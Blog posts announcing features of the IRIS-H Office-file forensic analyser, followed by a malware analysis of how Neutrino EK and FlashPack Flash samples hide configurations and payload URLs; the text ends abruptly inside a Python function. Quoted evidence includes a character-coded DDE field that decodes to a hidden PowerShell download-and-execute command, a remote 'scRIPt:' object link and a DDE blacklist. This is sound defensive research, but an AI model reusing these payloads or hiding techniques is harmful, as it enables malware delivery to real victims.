Thursday, 16 November 2017

IRIS-H (alpha): Updated OOXML 'document' file parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature update
Affected Components: API
Short Description: OOXML 'document' file parser has been updated to detect and extract "Drawing Object Non-Visual Properties".
Example: https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e
Outstanding Tasks: None

Detailed Summary

"Drawing Object Non-Visual Properties(docPr) element specifies non-visual object properties for the parent DrawingML object. These properties are specified as child elements of 'docPr' element." - ECMA-376 Part 1 (section 20.4.2.5)

The OOXML 'document' file parser has been updated to extract non-visual object properties associated with inline drawing objects (pictures). The extracted data is displayed in the corresponding 'document' panel under the 'Individual Components' section of the report page. The following properties are considered:

  • descr - Specifies alternative text for the current DrawingML object, for use by assistive technologies or applications which do not display the current object.
  • hidden - Specifies whether this DrawingML object is displayed. When a DrawingML object is displayed within a document, that object can be hidden (i.e., present, but not visible).
  • name - Specifies the name of the object. Typically, this is used to store the original file name of a picture object.
  • title - Specifies the title (caption) of the current DrawingML object.

Some of the above properties might be omitted from the property set. IRIS-H will only extract and display properties present in the set. See below for an example:
'document' panel showing non-visual object properties extracted from inline drawing object

As seen in the screenshot above, these properties might contain digital artifacts that can be helpful in a digital forensics investigation.
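
For readers who want to reproduce the idea offline, here is a minimal Python sketch of pulling the same four attributes out of a 'document' part. It is not the IRIS-H code; the function name and the sample XML are made up for illustration, and only attributes that are actually present are returned.

```python
import xml.etree.ElementTree as ET

# Namespaces used by WordprocessingML and its inline drawing wrapper
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
WP_NS = "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing"

# Hypothetical, heavily trimmed document.xml content (illustration only)
SAMPLE_DOCUMENT = f'''<w:document xmlns:w="{W_NS}" xmlns:wp="{WP_NS}">
  <w:body><w:p><w:r><w:drawing><wp:inline>
    <wp:docPr id="1" name="Picture 1" descr="invoice-logo-original.png"/>
  </wp:inline></w:drawing></w:r></w:p></w:body>
</w:document>'''

WANTED = ("descr", "hidden", "name", "title")


def extract_docpr(document_xml):
    """Return one dict per inline docPr element, keeping only present attributes."""
    root = ET.fromstring(document_xml)
    results = []
    for inline in root.iter(f"{{{WP_NS}}}inline"):
        for doc_pr in inline.findall(f"{{{WP_NS}}}docPr"):
            results.append({k: doc_pr.attrib[k] for k in WANTED if k in doc_pr.attrib})
    return results


print(extract_docpr(SAMPLE_DOCUMENT))
```

In a real DOCX the XML would first be read from 'word/document.xml' inside the ZIP container.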

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e




IRIS-H (alpha): Added OOXML 'Footer Part' parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API
Short Description: Parser for OOXML "Footer Part" has been added. The parser detects and extracts text content including special field characters.
Example: https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e
Outstanding Tasks: None

Detailed Summary

"Footer Part contains the information about a footer displayed for one or more sections. Each Footer part is the target of an explicit relationship in the part-relationship item for the Main Document. Each footer has a corresponding 'ftr' element in a Footer part, which contains the text of the footer." - ECMA-376 Part 1 (section 11.3.6)

A new parser for OOXML 'Footer Part' has been added to IRIS-H. The parser will detect and extract text content including special field characters. The extracted content can be found in a new panel under 'Individual Components' section on the report page. See an example below:


Example of a Footer Part panel showing extracted text content.

If the extracted content includes special field characters, they are analysed for the presence of blacklisted field character commands. If any are detected, the findings are shown in the 'Malicious Findings' panel on the report page. Below is the corresponding findings panel:


Corresponding findings panel showing detected field character type
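
The check described above can be approximated with a short Python sketch. This is an illustration rather than the IRIS-H implementation: the blacklist content, the function name and the sample footer are assumptions, and the token matching is deliberately naive.

```python
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Assumed blacklist; the real IRIS-H list is not published in this post
BLACKLIST = {"DDE", "DDEAUTO"}

# Hypothetical footer part with one visible run and one field instruction
SAMPLE_FOOTER = f'''<w:ftr xmlns:w="{W_NS}"><w:p>
  <w:r><w:t>Page footer</w:t></w:r>
  <w:r><w:fldChar w:fldCharType="begin"/></w:r>
  <w:r><w:instrText> DDEAUTO cmd.exe "/k calc.exe" </w:instrText></w:r>
  <w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:ftr>'''


def scan_footer(footer_xml):
    """Return (visible text, sorted list of blacklisted field commands found)."""
    root = ET.fromstring(footer_xml)
    text = "".join(t.text or "" for t in root.iter(f"{{{W_NS}}}t"))
    # Field instructions can be split across runs, so join them before tokenising
    instructions = "".join(i.text or "" for i in root.iter(f"{{{W_NS}}}instrText"))
    tokens = {token.upper() for token in instructions.split()}
    return text, sorted(tokens & BLACKLIST)


print(scan_footer(SAMPLE_FOOTER))
```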

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e



Thursday, 9 November 2017

IRIS-H (alpha): Added OOXML Relationships file parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API & UI (clear browser cache to see the changes)
Short Description: Parser for OOXML "Relationships" file has been added. The parser detects and extracts hyperlinks to external sources.
Outstanding Tasks: None

Detailed Summary

"Relationships are represented in XML in a Relationships part. Each part in the package that is the source of one or more relationships can have an associated Relationships part. This part holds the list of relationships for the source part." - ECMA-376 Part 2 (section 9.3.3)


Relationships file example
A new parser for OOXML Relationships file has been added to IRIS-H. The parser is configured to read every Relationship in the Relationships file and extract hyperlinks pointed at external sources. See below for an example of a Relationship that will be detected:
<Relationship Id="_id_1633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" TargetMode="External" Target="scRIPt:https://filetea.me/n3wBS7q8XNvRjiEwg8ZL2bXhw/dl" />
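
A rough Python equivalent of this detection, offered as a sketch and not as the IRIS-H code: it walks every Relationship element and keeps those marked TargetMode="External". The function name and the second (internal) relationship in the sample are invented for illustration.

```python
import xml.etree.ElementTree as ET

# Namespace of the package Relationships part
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

SAMPLE_RELS = f'''<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" />
  <Relationship Id="_id_1633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" TargetMode="External" Target="scRIPt:https://filetea.me/n3wBS7q8XNvRjiEwg8ZL2bXhw/dl" />
</Relationships>'''


def external_targets(rels_xml):
    """Return (relationship id, short type name, target) for every external relationship."""
    root = ET.fromstring(rels_xml)
    found = []
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        if rel.get("TargetMode") == "External":
            short_type = rel.get("Type", "").rsplit("/", 1)[-1]
            found.append((rel.get("Id"), short_type, rel.get("Target")))
    return found


for rel_id, rel_type, target in external_targets(SAMPLE_RELS):
    print(rel_id, rel_type, target)
```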

The extracted hyperlinks will be displayed under the "Suspicious Findings" panel. See below for an example:

"Suspicious Findings" example showing detected hyperlinks

Full report for the example above can be found here - https://iris-h.malwageddon.com/report/7b133ac4016aab06fff2c24e5d9e9e97

NOTE
You might need to clear your browser cache for the iris-h.malwageddon.com website before the IRIS-H UI changes take effect.



Wednesday, 8 November 2017

IRIS-H (alpha): Updated Field Characters Parser

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: feature improvement
Affected Components: API
Short Description: Parser for Field Characters used in OLE and OOXML documents has been updated to improve detection. QUOTE, SET, REF field characters have been added to the reporting.
Outstanding Tasks: None

Detailed Summary

The Field Character extraction and parsing code has been improved to allow for decoding QUOTE command arguments. The change was motivated by McAfee's blog post today referencing an OOXML document used in an APT type of attack. The document's XML code snippets below show an example of which field characters are used and how they appear in the code.


QUOTE field character usage example
DDE field character and the way its arguments are assembled
Unlike previous instances of DDE and DDEAUTO field character usage in malicious documents, this document doesn't expose the command arguments that normally contain indicators of compromise. Instead, a combination of other field characters is used to store and assemble the command arguments.

The SET command is used to store the value produced by the QUOTE command. That value is later passed to the DDE command through the REF field character. Below is an example of that:
SET c QUOTE 67 58 92 80 114 111 103 114 97 109 115 92 77 105 99 114 111 115 111 102 116 92 79 102 102 105 99 101 92 77 83 87 111 114 100 46 101 120 101 92 46 46 92 46 46 92 46 46 92 46 46 92 87 105 110 100 111 119 115 92 83 121 115 116 101 109 51 50 92 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 92 118 49 46 48 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 45 78 111 80 32 45 115 116 97 32 45 78 111 110 73 32 45 87 32 72 105 100 100 101 110 32 36 101 61 40 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 41 46 68 111 119 110 108 111 97 100 83 116 114 105 110 103 40 39 104 116 116 112 58 47 47 110 101 116 109 101 100 105 97 114 101 115 111 117 114 99 101 115 46 99 111 109 47 99 111 110 102 105 103 46 116 120 116 39 41 59 112 111 119 101 114 115 104 101 108 108 32 45 101 110 99 32 36 101 32 35
The 'c' variable now holds the output of the QUOTE command (a character string built from the array of character codes). Later, 'c' is referenced in the DDE command call as one of the arguments.
DDE REF c
When the DDE command is called, the value of the 'c' variable will be used as its argument.
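
The SET / QUOTE / REF chain is easy to replay by hand. The Python sketch below is not the IRIS-H handler. It only covers the simple "SET name QUOTE codes" and "COMMAND REF name" shapes shown above, the function names are made up, and the sample uses just the first eleven character codes from the document.

```python
import re


def decode_quote(instruction):
    """Turn the decimal character codes following QUOTE into a string."""
    match = re.search(r"\bQUOTE((?:\s+\d+)+)", instruction, re.IGNORECASE)
    if match is None:
        return None
    return "".join(chr(int(code)) for code in match.group(1).split())


def evaluate(fields):
    """Store SET values, then resolve 'COMMAND REF name' against them."""
    variables = {}
    resolved = []
    for field in fields:
        tokens = field.split()
        if len(tokens) >= 3 and tokens[0].upper() == "SET":
            variables[tokens[1]] = decode_quote(field)
        elif len(tokens) == 3 and tokens[1].upper() == "REF":
            resolved.append((tokens[0], variables.get(tokens[2])))
    return resolved


# First eleven codes of the QUOTE array shown above
fields = ["SET c QUOTE 67 58 92 80 114 111 103 114 97 109 115", "DDE REF c"]
print(evaluate(fields))
```

Feeding the full code array from the sample into decode_quote() reveals the complete command line that the DDE field would receive.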

IRIS-H field character handlers have been updated to extract the array of character codes associated with the QUOTE command and decode it. If extraction and decoding succeed, the report page will contain output similar to the example below.

Example of QUOTE command evaluation
This method of using field characters presents new challenges, especially around reconstructing the original text in the same sequence as it appears when the document is opened with its host application. IRIS-H will still attempt to extract all the text fields, but the original order of the text cannot be guaranteed.

Full report can be found here - https://iris-h.malwageddon.com/report/e0b8c953e3e6c3f133d1d9301e8eb15a

Tuesday, 7 November 2017

IRIS-H (alpha): Added support for Shell Link (.LNK) files

Quick Summary

Build Version: 0.0.1(alpha)
Change Type: new feature
Affected Components: API & UI
Short Description: Shell Link (.LNK) file format parser has been added to API component. Cosmetic changes to UI to align new data view with the existing format.
Outstanding Tasks: Implement support for missing Extra Data Blocks

Detailed Summary

New binary data parser has been added to IRIS-H service. It can handle processing and extracting digital artifacts from Shell Link (.LNK) files. The service now accepts LNK files through Submission page and can also automatically detect them embedded into submitted documents. In either case, the report page will display extracted binary data enriched with human readable description. The enrichment process references the official Microsoft specification for [MS-SHLLINK] Binary File Format.

The parser fully supports the following LNK file structures:

  • ShellLinkHeader
  • LinkTargetIDList
  • LinkInfo
  • StringData
ExtraData structure is partially supported at this time. Only the following Data Blocks will be processed:
  • EnvironmentVariableDataBlock
  • KnownFolderDataBlock
  • SpecialFolderDataBlock
  • TrackerDataBlock
  • PropertyStoreDataBlock
Once all binary data is extracted, it is subjected to a rule-based evaluation to conclude whether the submitted or embedded LNK file can be harmful. IRIS-H will also attempt to reconstruct the command line, including arguments if any. Below is an example of rule-based evaluation results.

LNK file rule-based evaluation results
A few new sections have been added to the "Informational Findings" panel. The sections display information relevant to the LNK file target: file path, working directory, relative path, command-line arguments, etc. One particular section, "Link Target Tracking", contains the evaluation results of the data stored in the following TrackerDataBlock fields:
  • Droid Volume Identifier
  • Droid File Identifier
  • Birth Droid Volume Identifier
  • Birth Droid File Identifier
Based on this data, IRIS-H will try to identify if the link target file was moved between the volumes on the original computer or if it was moved to another machine. For more information see page 10 of this PDF. Below is an example of "Informational Findings" view.

LNK file Informational Findings example
"Detailed Components Breakdown" section of the report contains all the data IRIS-H could extract from an LNK file. I was personally surprised to find out how much those little files actually contain. For example, TrackerDataBlock holds the Link Target originator machine's NetBIOS name and MAC address. See below for an example.

Data derived from TrackerDataBlock
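
To make the TrackerDataBlock discussion more concrete, here is a hedged Python sketch that follows the layout in [MS-SHLLINK]: four 32-bit fields, a 16-byte MachineID, then the Droid and DroidBirth GUID pairs. The function name is invented. Reading the MAC address from the node field of the file identifier assumes that identifier is a version 1 UUID, and the two "changed" flags are a simplistic illustration, not the IRIS-H evaluation rules.

```python
import struct
import uuid

TRACKER_SIGNATURE = 0xA0000003


def parse_tracker_block(block):
    """Parse a 96-byte TrackerDataBlock into a dict of readable values."""
    size, signature, length, version = struct.unpack_from("<IIII", block, 0)
    if signature != TRACKER_SIGNATURE or size != 0x60:
        raise ValueError("not a TrackerDataBlock")
    # MachineID: NetBIOS name, NUL-padded to 16 bytes
    machine_id = block[16:32].split(b"\x00", 1)[0].decode("ascii", "replace")
    # Four consecutive GUIDs: Droid volume/file, then DroidBirth volume/file
    guids = [uuid.UUID(bytes_le=block[32 + 16 * i:48 + 16 * i]) for i in range(4)]
    droid_volume, droid_file, birth_volume, birth_file = guids
    # Assumption: the file identifier is a version 1 UUID, so its node is a MAC address
    mac = ":".join(f"{b:02x}" for b in droid_file.node.to_bytes(6, "big"))
    return {
        "machine_id": machine_id,
        "mac_address": mac,
        "volume_changed": droid_volume != birth_volume,
        "file_id_changed": droid_file != birth_file,
    }
```

A difference between the Droid and DroidBirth values is the kind of signal a "Link Target Tracking" rule could build on.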

The ShellLinkHeader section contains time stamps associated with the Link Target, as well as its file attributes, the type of the media it resides on (hard disk, USB, network, etc.), media serial number and even the command line window state. See below for an example.

Data derived from ShellLinkHeader
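
As a companion to the screenshot, the fixed 76-byte header can be unpacked with a few lines of Python. This sketch follows the field order given in [MS-SHLLINK] and covers only fields that live in the header itself. The function and dictionary key names are illustrative, not taken from IRIS-H.

```python
import struct
import uuid
from datetime import datetime, timedelta

# HeaderSize, LinkCLSID, LinkFlags, FileAttributes, 3 x FILETIME,
# FileSize, IconIndex, ShowCommand, HotKey, Reserved1..3  (76 bytes in total)
HEADER_FORMAT = "<I16sIIQQQIiIHHII"
SHELL_LINK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}


def filetime_to_datetime(filetime):
    """Convert 100-nanosecond ticks since 1601-01-01 (UTC) to a naive datetime."""
    if filetime == 0:
        return None
    return datetime(1601, 1, 1) + timedelta(microseconds=filetime // 10)


def parse_shell_link_header(data):
    (size, clsid, flags, attributes, created, accessed, written,
     file_size, icon_index, show, hotkey, _r1, _r2, _r3) = struct.unpack_from(HEADER_FORMAT, data, 0)
    if size != 0x4C or uuid.UUID(bytes_le=clsid) != SHELL_LINK_CLSID:
        raise ValueError("not a Shell Link header")
    return {
        "link_flags": flags,
        "file_attributes": attributes,
        "creation_time": filetime_to_datetime(created),
        "access_time": filetime_to_datetime(accessed),
        "write_time": filetime_to_datetime(written),
        "file_size": file_size,
        "show_command": SHOW_COMMANDS.get(show, "SW_SHOWNORMAL"),
    }
```

Typical usage would be to read the first 76 bytes of a .lnk file in binary mode and pass them to parse_shell_link_header().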
In addition, IRIS-H will attempt to resolve "Known Folder" GUID and "Special Folder" ID and display their corresponding descriptions. See an example below.

Enriched data derived from KnownFolderDataBlock and SpecialFolderDataBlock
Examples of full reports can be found on the links below:

https://iris-h.malwageddon.com/report/738e74f744e554d6ac89899357eca506 - embedded LNK file found in a Microsoft Office document.




Thursday, 21 September 2017

Announcement: IRIS-H (alpha) - Online Digital Forensic Tool for Microsoft Office Files

Introduction

IRIS-H is an online web service that performs static analysis of files stored in directory-based or strictly structured formats. The service disassembles submitted files into individual components based on the detected file format and performs static analysis of each component. The analysis process involves sequentially reading the components' binary data and enriching it with human readable information. The enrichment process is based on the binary data description in the official file format specification. Further rule-based evaluation is performed on the extracted data in order to establish if the submitted file can be harmful to a computer system.

Disclaimer

Currently, the service is still being developed and is running in the alpha phase of the release life cycle. Application updates are pushed regularly and may require a full data flush. There is absolutely no guarantee that the uploaded data and corresponding generated reports will be available during the 'alpha' cycle. Any development/maintenance is done in my free time - this service is the result of a hobby rather than a paid job.

Acknowledgements

I'd like to say 'Thank You!' to the following individuals and organizations for their direct and/or indirect support. 👍
  • VirusTotal crew
  • StackOverflow ReactJS and NodeJS communities
  • Decalage
  • Individual security researchers who provided their invaluable feedback that materialized into improved and new features (I do not support fame leeching, so no names, but you know who you are)

IRIS-H Service

Pre-history

(skip to the next paragraph if you're not into fairy tales and stuff...)
Once upon a time I decided that challenging myself with learning JavaScript flavors is a great idea... well, still think it's a great idea... So, I set out on a quest to build something as I learn it. Looking far and wide, I thought a simple console based digital forensic tool could be a good start. Little did I know at the time how far it would actually take me... and so I ended up creating IRIS-H. The name doesn't really stand for anything with 'Next Generation' or 'Artificial Intelligence' or 'Blockchain' or even 'Cyber' buzz words in mind (sorry, no lasers either), despite having a logo. It's simply my tribute to all the hard working Irish people I've had the pleasure to encounter in my last 20 years living in Ireland.

So, what's it all about?...

I'd like to share an online tool I've been working on for the last few months. IRIS-H is mainly positioned as a digital forensics tool, though it has some rule-based logic it applies in order to determine the outcome of opening the analysed file on a computer system. The digital forensics aspect revolves around putting descriptive meaning on the binary data derived from the analysed file. Where possible, the tool attempts to extract digital artifacts to allow for further manual or automated analysis. In the case of malicious file analysis, a trained eye could leverage the tool to perform a simple 'campaign' type attribution based on the data derived by the service and their best judgment.

It's important to note that IRIS-H is not a sandbox environment. The submitted file is never opened with its corresponding host application. This slightly limits IRIS-H functionality in terms of obtaining network based indicators of compromise (IoC). Still, the service attempts to evaluate the risk of opening the file on a computer system based on the IoCs derived from the binary data and the presence of certain digital artifacts. Sometimes, when you search for a quick answer, this might be all you need.

IRIS-H can do some tricks, but the service is far from being mature. It's at the stage where it just started bringing some value to the work I do, so I hope it can do the same for the others.

Right, what can it do?...

The interaction with the service is done through its web interface. The interface allows for navigation through web pages that offer specific service features.
  • Home Page - offers ability to view latest file submissions. The view is utilizing a table to present the following data: submission time, submitted file MD5 hash, file name at submission time, detected file type and the result of rule-based risk evaluation.
Latest Submissions table view
  • Search Page - offers ability to search the service database using MD5, SHA1 or SHA256 hash strings. If a successful analysis already exists for the file with the provided hash the user is forwarded to a corresponding Report Page(more on this below).
Search Form view

  • Submit Page - offers ability to submit a file to be analyzed. File size and type validations are performed on this page. The page provides a 'drag-and-drop', 'no-submit-button' component to allow service users to select a file to submit. The upload file size limit is set to 10MB. If the submitted file type is not supported, an alert is shown notifying the user. Only single file submissions are supported at this time. Zipped files are not accepted yet.
Submit Page dropzone box
The following are some examples of what IRIS-H service can handle at this stage:
  • Files saved in Microsoft Office 97-2003 format (DOC, XLS, PPT) - only DOC files are fully supported at the moment
  • Files saved in Microsoft Office 2007+ format (DOCX, PPTX) - only DOCX files are fully supported at the moment. XLSX are not being accepted yet.
  • VBA project files extracted from Microsoft Office documents that are saved in Office Open XML (OOXML) format
  • Objects embedded into other Microsoft Office documents including those in OOXML format
Technically, IRIS-H will accept and attempt to process any file in OLE-CF format. There are case-by-case limitations though, where the service might not have a parser for 'not-so-common' OLE stream types.

Once a file is accepted and uploaded, IRIS-H begins dissecting the submitted file into separate components for further automated static analysis. When the analysis is completed, the user is forwarded to a corresponding Report Page.

Report Page is where everything comes together and to help service users navigate through the chunks of information, the page provides a navigation bar.
Left Navigation Bar Example
The information presented on the Report Page is a mixture of high level and 'deep dive' forensics data. The original idea was to be able to export it into a file format that can be stored or shared(like, PDF or similar), but due to some technical challenges I couldn't overcome I enabled report availability through its URL link.

Alright, but what's in it for me?...

Well, one would have to try it out and see, right? 😜 IRIS-H service is available at https://iris-h.malwageddon.com/ . Please make sure you familiarise yourself with the Terms of Service. There is also an About page that provides more details about the service.

... but just to give you some ideas, the screenshots below highlight some of the findings I came across using the file samples at my disposal.
VBA Digital Signature details
Detection for Microsoft Office field characters
IRIS-H detected embedded VBS script in the submitted file
'deep-dive' digital forensics view of the VBS file reported above.
Results of VBA scripts analysis
Partial view of document embedded form analysis showing UA string hidden in form's tag field

Partial view of document meta data analysis showing URLs stored in the document
'deep-dive' forensics view of a linked object showing object's name and network path where it's stored
'deep-dive' forensics view of data from WordDocument stream showing Revision History, System Fonts and Users data
Example of Extracted Images preview
Example of findings view showing evidence of a linked ZIP file from the document
Example of extracted downloadable artifact (VBA macro script in this case)

Closing Note

If you have any feedback please do not hesitate to reach out. I believe, there is no better way to improve something, but to hear what people think about it.

Sunday, 22 March 2015

Data Obfuscation: Now you see me... Now you don't...

Introduction

This blog post shows how malware authors use Adobe Flash files to hide their creations' 'sensitive' data. I'll be using 2 recent Neutrino EK and 1 FlashPack malvertising samples to demonstrate it. In the case of Neutrino EK our goal will be extraction and decryption of its configuration file and in the malvertising case we'll be after the initial payload URL + exploit shellcode.

Executive Summary

It's fair to say that the exploit kit world has been spinning around Adobe Flash files lately. The ActionScript scripting language that drives SWF file execution is quite versatile and, when combined with other SWF features such as binary data containers or image embedding, creates a strong application environment capable of executing relatively complex tasks. Some exploit kit authors are already using SWF files as an all-in-one 'solution'. For example, Neutrino EK (aka Job314, aka Alter EK) uses Adobe Flash Player files to store exploit code, execution control logic (environment checks, exploit code selection, etc.), decryption keys for its various components and the configuration file. SWF file obfuscation applications further enhance data hiding capabilities and also drastically impede reverse engineering efforts, making SWF files even more attractive to malware authors. The SWF file analysis below demonstrates how ActionScript combined with base64 encoding, RC4 encryption and image files can be used to hide data.


What is magic?

The Neutrino EK sample analysed in this section was captured in Dec 2014. Its relatively simple landing page contains a request for an SWF file and what appears to be a base64 encoded GIF file.

Neutrino EK Dec 2014 sample - base64 encoded GIF stored on the landing page

Let's start with the GIF file and try to manually reconstruct it. After unescaping and base64 decoding it, we end up with a chunk of binary data that's anything but a GIF file. So, it has to mean something else. Note that the <img> tag has an 'id' attribute - 'mqdscriyolhypdbstnmv'. There is no reference to it on the landing page, so quite possibly it's being used by the SWF file. After some reverse engineering 'kung-fu' and ActionScript review we come across the function below:

Neutrino EK Dec 2014 sample - AS3 function to decode data stored in 'mqdscriyolhypdbstnmv' landing page element

The function appears to do the following:
  • compiles and calls a JavaScript to pull out the content of the landing page element with id - 'mqdscriyolhypdbstnmv'
  • splits the pulled content at 'base64,' expression creating 2 data chunks
  • unescapes and base64 decodes the 'second' chunk
  • runs the resulting data through RC4 decryption routine
So, we have already completed 'unescape' and 'base64 decode' operations, all we're missing now is the RC4 decryption pass for which we need to know the key. The routine above tells us to look for it in 'getRtConfigKey()' function. Let's take a look there.

Neutrino EK Dec 2014 sample - the configuration file RC4 decryption key

Alright, we got the key. Now let's find out what happens if we decrypt our data chunk with it.

Neutrino EK Dec 2014 sample - decrypted configuration file

There we go. The configuration file.
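
For reference, the whole chain (split at 'base64,', unescape, base64 decode, RC4) fits in a few lines of Python. This is a sketch of the steps listed above, not the kit's ActionScript. The function names are illustrative and the real key has to be taken from 'getRtConfigKey()' in the sample.

```python
import base64
from urllib.parse import unquote


def rc4(key, data):
    """Plain RC4: key scheduling followed by keystream XOR (same call encrypts and decrypts)."""
    state = list(range(256))
    j = 0
    for i in range(256):
        j = (j + state[i] + key[i % len(key)]) % 256
        state[i], state[j] = state[j], state[i]
    i = j = 0
    output = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + state[i]) % 256
        state[i], state[j] = state[j], state[i]
        output.append(byte ^ state[(state[i] + state[j]) % 256])
    return bytes(output)


def decode_config(img_src, key):
    """Mirror the steps above: split at 'base64,', unescape, base64 decode, RC4 decrypt."""
    encoded = img_src.split("base64,", 1)[1]
    encrypted = base64.b64decode(unquote(encoded))
    return rc4(key, encrypted)
```

Calling decode_config() with the 'src' value of the <img> element and the key as bytes should return the decrypted configuration, provided the sample follows exactly the steps described here.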

Just to make it a bit clearer why there are many initial payload URLs, let's take a look at the SWF file structure
Neutrino EK Dec 2014 sample - decrypted SWF structure

Take a look at the content of the 'exploit' folder in the screenshot above and note the 5 ActionScript filenames. Each of those scripts contains a routine that decrypts and launches an exploit code for some vulnerability. Now take a look at the tag names for each URL in the configuration file. Besides the first two, the rest of the names match the names of the ActionScripts. So, it appears that each exploit code has a unique URL associated with it to download the initial payload.

Focused deception.

The Neutrino EK sample analysed in this section was captured in Mar 2015. The landing page of this sample no longer has an <img> element with encoded data. In fact, it has nothing except the code requesting an SWF file.

Neutrino EK Mar 2015 sample - landing page

Into ActionScript code we descend again... until we reach a function that 'coincidentally' has the same name as in Dec 2014 sample - 'decodeRtConfig()'

Neutrino EK Mar 2015 sample - the configuration file decoding routine

As expected, there is no code interacting with any data outside of the SWF file, but instead there is a routine that performs some data manipulations with a binary data stored in one of the SWF binary data containers. Let's see what it does:
  • loads data from a binary data container
  • reads first 3 bytes and converts them into an Integer with radix 16
  • continues reading the data until bytes count reaches the Integer value
  • runs the read data through RC4 decryption routine
So, simply put, there is a chunk of data that we need to read just a part of and run it through RC4 decryption routine. Now we need to find out how much data we need to read and what the decryption key is. The key is not a problem at all since it can be found in the ActionScript code.

Neutrino EK Mar 2015 sample - the configuration file decryption key

For the Integer value of bytes to read we'll have to do some maths magic which will convert the first 3 bytes (0x36 0x32 0x65) into *drums roll*... 1582. Right, now we know how much data to read and the key to decrypt it.
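
The 'maths magic' is simply reading the three bytes as ASCII hex digits: 0x36 0x32 0x65 is the text "62e", and 0x62e is 1582. A small Python sketch of the carving step follows. The function name is made up, and it assumes the encrypted data starts right after the 3-byte length prefix, which the post does not state explicitly.

```python
def carve_encrypted_config(container):
    """Read the 3-character hex length prefix and return (length, encrypted bytes)."""
    # The first 3 bytes are ASCII hex digits, e.g. b"62e"
    length = int(container[:3].decode("ascii"), 16)
    # Assumption: the payload immediately follows the prefix
    return length, container[3:3 + length]


prefix = bytes([0x36, 0x32, 0x65])
print(prefix.decode("ascii"), int(prefix.decode("ascii"), 16))
```

The carved bytes would then go through the same kind of RC4 pass as in the Dec 2014 sample, using the key found in the ActionScript code.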

Neutrino EK Mar 2015 sample - decrypted configuration file

And that's how we deal with this type of data hiding technique.

But deception meant to entertain.

At the beginning of February 2015 a FlashPack malvertising campaign was making the rounds dropping CryptoWall malware. The scheme was rather interesting:
  • browser opens a webpage that requests some advertisement content from an ad TDS
  • TDS points the browser to an SWF file hosted on RackSpace CDN
  • browser starts showing the advertisement content that looks absolutely legit
  • 6 minutes later SWF generates a request to download CryptoWall malware
Let's take a closer look at this SWF file

FlashPack malvertising Feb 2015 sample - SWF with 'bonus scenes'

In a nutshell, there are 2 embedded SWF files, each occupying a binary data container. One of them contains some legitimate advertisement content and the other one contains exploit code for CVE-2014-0569. Let's examine the latter more closely.

FlashPack malvertising Feb 2015 sample - initialization routine

After some environment checks, the execution comes to an interesting chain of events(last 2 lines of code in the screenshot above).
  • function 'images' is called with one argument passed to it
  • the returned value from 'images' is passed to 'decodeurl' function
  • the returned value from 'decodeurl' is passed to 'hex2bin' function
  • the returned value from 'hex2bin' is split at '&' character
Judging by the function names, we can assume that by passing some data stored in 'var_29' to 'images' function we will end up with 2 pieces of data on 'hex2bin' return - one presumably some URL and the other one unknown yet. So, let's find out what 'var_29' is.


'var_29' is assigned 'class_7' object. So, what is this object...


Ok, 'class_7' appears to be a 'BitmapAsset', but which one...


Alright, 'var_29' is actually an image file stored in SWF file. Now, let's find out what happens to it when it's passed to 'images' function.

FlashPack malvertising Feb 2015 sample - 'images' function

The function is performing the following:
  • extracts image's bitmap data
  • identifies the number of pixel rows
  • reads pixel values one by one from each identified row
  • converts each pixel value to a character and adds it to a string
Simple enough operation, but let's find out what happens with the resulting string in the 'decodeurl' function.

FlashPack malvertising Feb 2015 sample - 'decodeurl' function

This function is performing the following:
  • loops through the string received from 'images' function character by character
  • finds the position of each character in a predefined string - '_loc3_'
  • takes a character in the same position, but from a different string - '_loc2_'
  • adds this character to a new string - '_loc4_'
The result of 'decodeurl' function is expected to be a string of 'hex' values. So, let's see what happens during the final transformation of what used to be an image file before.

FlashPack malvertising Feb 2015 sample - 'hex2bin' function

The 'hex2bin' function is indeed expecting a string of 'hex' values. It loops through the string reading two characters at a time, converts each pair to a character and adds that character to a string.

Exactly my feeling after analyzing this sample

Ok, now let's do the same thing in Python and see what happens.
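
The script itself is only shown as a screenshot, so here is a minimal sketch of what such a re-implementation could look like. Several things are assumptions: the two alphabets stand in for the '_loc3_' and '_loc2_' strings (their real values are not reproduced in this post), pixel values are taken to map directly to character codes, and the pixel rows are passed in as plain lists instead of being read from the PNG with an imaging library.

```python
# Hypothetical substitution alphabets standing in for '_loc3_' and '_loc2_'
SRC_ALPHABET = "qwertyuiopasdfgh"
DST_ALPHABET = "0123456789abcdef"


def images(pixel_rows):
    """Read pixel values row by row and turn each value into a character."""
    return "".join(chr(value) for row in pixel_rows for value in row)


def decodeurl(text, src_alphabet=SRC_ALPHABET, dst_alphabet=DST_ALPHABET):
    """Replace each character with the one at the same position in the other alphabet."""
    return "".join(dst_alphabet[src_alphabet.index(ch)] for ch in text)


def hex2bin(hex_text):
    """Convert pairs of hex characters into single characters."""
    return "".join(chr(int(hex_text[i:i + 2], 16)) for i in range(0, len(hex_text), 2))


def decode_image(pixel_rows):
    """Chain the three functions and split the result at '&'."""
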